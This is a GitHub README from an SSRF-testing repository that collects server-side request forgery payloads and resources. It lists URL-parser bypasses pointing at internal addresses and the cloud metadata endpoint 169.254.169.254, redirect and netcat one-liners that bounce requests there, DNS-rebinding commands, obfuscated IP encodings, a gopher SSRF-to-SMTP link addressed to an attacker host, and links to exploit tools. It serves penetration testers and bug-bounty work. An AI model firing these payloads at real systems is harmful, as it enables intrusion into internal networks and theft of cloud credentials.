Skip to content

cujanovic/SSRF-Testing

master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Code

README.md

Buy Me A Coffee

I'm grateful for the support received by Tutanota

SSRF (Server Side Request Forgery) testing resources


Quick URL based bypasses:

http://google.com:80+&@127.88.23.245:22/#+@google.com:80/

http://127.88.23.245:22/+&@google.com:80#+@google.com:80/

http://google.com:80+&@google.com:80#+@127.88.23.245:22/

http://127.88.23.245:22/?@google.com:80/

http://127.88.23.245:22/#@www.google.com:80/

http://google.com:80\\@127.88.23.245:22/


htaccess - redirect test for various cases

Status codes: 300, 301, 302, 303, 305, 307, 308

Filetypes: jpg, json, csv, xml, pdf

Live demo:

jpg 301 response without and with a valid response body:

https://ssrf.localdomain.pw/img-without-body/301-http-169.254.169.254:80-.i.jpg

https://ssrf.localdomain.pw/img-without-body-md/301-http-.i.jpg

https://ssrf.localdomain.pw/img-with-body/301-http-169.254.169.254:80-.i.jpg

https://ssrf.localdomain.pw/img-with-body-md/301-http-.i.jpg

json 301 response without and with a valid response body:

https://ssrf.localdomain.pw/json-without-body/301-http-169.254.169.254:80-.j.json

https://ssrf.localdomain.pw/json-without-body-md/301-http-.j.json

https://ssrf.localdomain.pw/json-with-body/301-http-169.254.169.254:80-.j.json

https://ssrf.localdomain.pw/json-with-body-md/301-http-.j.json

csv 301 response without and with a valid response body:

https://ssrf.localdomain.pw/csv-without-body/301-http-169.254.169.254:80-.c.csv

https://ssrf.localdomain.pw/csv-without-body-md/301-http-.c.csv

https://ssrf.localdomain.pw/csv-with-body/301-http-169.254.169.254:80-.c.csv

https://ssrf.localdomain.pw/csv-with-body-md/301-http-.c.csv

xml 301 response without and with a valid response body:

https://ssrf.localdomain.pw/xml-without-body/301-http-169.254.169.254:80-.x.xml

https://ssrf.localdomain.pw/xml-without-body-md/301-http-.x.xml

https://ssrf.localdomain.pw/xml-with-body/301-http-169.254.169.254:80-.x.xml

https://ssrf.localdomain.pw/xml-with-body-md/301-http-.x.xml

pdf 301 response without and with a valid response body:

https://ssrf.localdomain.pw/pdf-without-body/301-http-169.254.169.254:80-.p.pdf

https://ssrf.localdomain.pw/pdf-without-body-md/301-http-.p.pdf

https://ssrf.localdomain.pw/pdf-with-body/301-http-169.254.169.254:80-.p.pdf

https://ssrf.localdomain.pw/pdf-with-body-md/301-http-.p.pdf


custom-30x - Custom 30x responses and Location header with PHP

Live demo:

https://ssrf.localdomain.pw/custom-30x/?code=332&url=http://169.254.169.254/&content-type=YXBwbGljYXRpb24vanNvbg==&body=eyJhIjpbeyJiIjoiMiIsImMiOiIzIn1dfQ==&fakext=/j.json


custom-200 - Custom 200 response and Content-Location header with PHP

Live demo:

https://ssrf.localdomain.pw/custom-200/?url=http://169.254.169.254/&content-type=YXBwbGljYXRpb24vanNvbg==&body=eyJhIjpbeyJiIjoiMiIsImMiOiIzIn1dfQ==&fakext=/j.json


custom-201 - Custom 201 response and Location header with PHP

Live demo:

https://ssrf.localdomain.pw/custom-201/?url=http://169.254.169.254/&content-type=YXBwbGljYXRpb24vanNvbg==&body=eyJhIjpbeyJiIjoiMiIsImMiOiIzIn1dfQ==&fakext=/j.json


Minimal web server using netcat

while true ; do nc -l -p 80 -c 'echo -e "HTTP/1.1 302 Found\nContent-Type: application/json\nLocation: http://169.254.169.254/\n{\"a\":\"b\"}"'; done

export RTSPLOCATION="http://169.254.169.254/"; while true ; do nc -l -p 554 -c 'echo -e "RTSP/1.0 301 Moved\nCSeq: 1\nLocation: $RTSPLOCATION"'; done


ip.py - Alternate IP encoding tool useful for SSRF Testing

python ip.py IP PORT WhiteListedDomain EXPORT(optional)

python ip.py 169.254.169.254 80 www.google.com

python ip.py 169.254.169.254 80 www.google.com export


DNS pinning

nslookup ssrf-169.254.169.254.localdomain.pw

nslookup ssrf-cloud.localdomain.pw

http://xip.io/

nslookup 169.254.169.254.xip.io

nslookup 1ynrnhl.xip.io

nslookup www.owasp.org.1ynrnhl.xip.io

nslookup 127.127.127.127.xip.io

https://nip.io/

nslookup 169.254.169.254.nip.io

nslookup app-169-254-169-254.nip.io

nslookup owasp.org.169.254.169.254.nip.io

nslookup customer2-app-169-254-169-254.nip.io

nslookup 127.127.127.127.nip.io


DNS pinning race condition

nslookup ssrf-race-169.254.169.254.localdomain.pw


DNS Rebinding

pip install twised

python3 dns.py WhitelistedIP InternalIP ServerIP Port Domain

python3 dns.py 216.58.214.206 169.254.169.254 78.47.24.216 53 localdomains.pw

http://webcache.googleusercontent.com/search?q=cache:http://www.611eternity.com/DNSRebinding%E6%8A%80%E6%9C%AF%E5%AD%A6%E4%B9%A0/

DNS Rebinding Exploitation Framework - https://github.com/mwrlabs/dref


cloud-metadata.txt - Cloud Metadata Dictionary useful for SSRF Testing


svg - SSRF with svg files


ffmpeg - SSRF with ffmpeg

https://hackerone.com/reports/237381

https://hackerone.com/reports/243470

https://github.com/neex/ffmpeg-avi-m3u-xbin

https://www.blackhat.com/docs/us-16/materials/us-16-Ermishkin-Viral-Video-Exploiting-Ssrf-In-Video-Converters.pdf

https://docs.google.com/presentation/d/1yqWy_aE3dQNXAhW8kxMxRqtP7qMHaIfMzUDpEqFneos/edit#slide=id.g22371f2702_0_15


iframe - SSRF with html iframe + URL bypass

Live demo:

http://ssrf.localdomain.pw/iframe/?proto=http&ip=127.0.0.1&port=80&url=/


Abusing Enclosed Alphanumerics

http://169。254。169。254/

http://169。254。169。254/

http://⑯⑨。②⑤④。⑯⑨。②⑤④/

http://⓪ⓧⓐ⑨。⓪ⓧⓕⓔ。⓪ⓧⓐ⑨。⓪ⓧⓕⓔ:80/

http://⓪ⓧⓐ⑨ⓕⓔⓐ⑨ⓕⓔ:80/

http://②⑧⑤②⓪③⑨①⑥⑥:80/

http://④②⑤。⑤①⓪。④②⑤。⑤①⓪:80/

http://⓪②⑤①。⓪③⑦⑥。⓪②⑤①。⓪③⑦⑥:80/

http://⓪⓪②⑤①。⓪⓪⓪③⑦⑥。⓪⓪⓪⓪②⑤①。⓪⓪⓪⓪⓪③⑦⑥:80/

http://[::①⑥⑨。②⑤④。⑯⑨。②⑤④]:80/

http://[::ⓕⓕⓕⓕ:①⑥⑨。②⑤④。⑯⑨。②⑤④]:80/

http://⓪ⓧⓐ⑨。⓪③⑦⑥。④③⑤①⑧:80/

http://⓪ⓧⓐ⑨。⑯⑥⑧⑨⑥⑥②:80/

http://⓪⓪②⑤①。⑯⑥⑧⑨⑥⑥②:80/

http://⓪⓪②⑤①。⓪ⓧⓕⓔ。④③⑤①⑧:80/


commonly-open-ports.txt - list of commonly open ports


SSRF2SMTP

https://ssrf.localdomain.pw/ssrf2smtp/?proto=gopher&ip=0&port=25&domain=domain.com&to=email@attacker.com&code=301


Schemes-List.xlsx - 800 of known schemas + useful references

https://github.com/irsdl/OutlookLeakTest/blob/master/Schemes-List.xlsx?raw=true


Java/Python FTP Injections Allow for Firewall Bypass

http://webcache.googleusercontent.com/search?q=cache:http://blog.blindspotsecurity.com/2017/02/advisory-javapython-ftp-injections.html

https://github.com/ecbftw/poc/blob/master/java-python-ftp-injection/ftp-injection-server.py

http://webcache.googleusercontent.com/search?q=cache:https://shiftordie.de/blog/2017/02/18/smtp-over-xxe/


SSRF + Gopher + Redis

http://webcache.googleusercontent.com/search?q=cache:http://vinc.top/2016/11/24/%E3%80%90ssrf%E3%80%91ssrfgopher%E6%90%9E%E5%AE%9A%E5%86%85%E7%BD%91%E6%9C%AA%E6%8E%88%E6%9D%83redis/

https://webcache.googleusercontent.com/search?q=cache:http://antirez.com/news/96


Top 5 features that are often prone to SSRF vulnerabilities:

https://webcache.googleusercontent.com/search?q=cache:https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF


Joshua Maddux - When TLS Hacks You

https://www.youtube.com/watch?v=qGpAJxfADjo

https://github.com/jmdx/TLS-poison


AppSecEU15-Server_side_browsing_considered_harmful.pdf

https://www.youtube.com/watch?v=8t5-A4ASTIU


us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf

https://www.youtube.com/watch?v=D1S-G8rJrEk


A tiny and cute URL fuzzer

https://github.com/orangetw/Tiny-URL-Fuzzer


Bypassing Server-Side Request Forgery filters by abusing a bug in Ruby's native resolver

https://edoverflow.com/2017/ruby-resolv-bug/

https://hackerone.com/reports/287245

https://hackerone.com/reports/215105

0177.1 => 127.0.0.1

0x7f.1 => 127.0.0.1

127.1 => 127.0.0.1


AWS bypass only

http://instance-data/latest/meta-data/


SSRF Tips

http://webcache.googleusercontent.com/search?q=cache:http://blog.safebuff.com/2016/07/03/SSRF-Tips/


PHP SSRF Techniques

https://medium.com/secjuice/php-ssrf-techniques-9d422cb28d51


SSRF bible

https://docs.google.com/document/d/1v1TkWZtrhzRLy0bYXBcdLUedXGb9njTNIJXa3u9akHM


SSRF Proxy

https://github.com/bcoles/ssrf_proxy

SSRF Proxy facilitates tunneling HTTP communications through servers vulnerable to Server-Side Request Forgery


SSRF via Request Splitting

https://www.rfk.id.au/blog/entry/security-bugs-ssrf-via-request-splitting/


Overly Permissive Proxy

https://www.nginx.com/blog/trust-no-one-perils-of-trusting-user-input/

curl http://remote-ip-address/latest/meta-data/ -H "Host: 169.154.169.254"


All you need to know about SSRF and how may we write tools to do auto-detect

https://medium.com/bugbountywriteup/the-design-and-implementation-of-ssrf-attack-framework-550e9fda16ea


Gopherus - This tool generates gopher link for doing SSRF and RCE in various servers

https://spyclub.tech/2018/08/14/2018-08-14-blog-on-gopherus/


A Glossary of Blind SSRF Chains

https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/


Buy Me A Coffee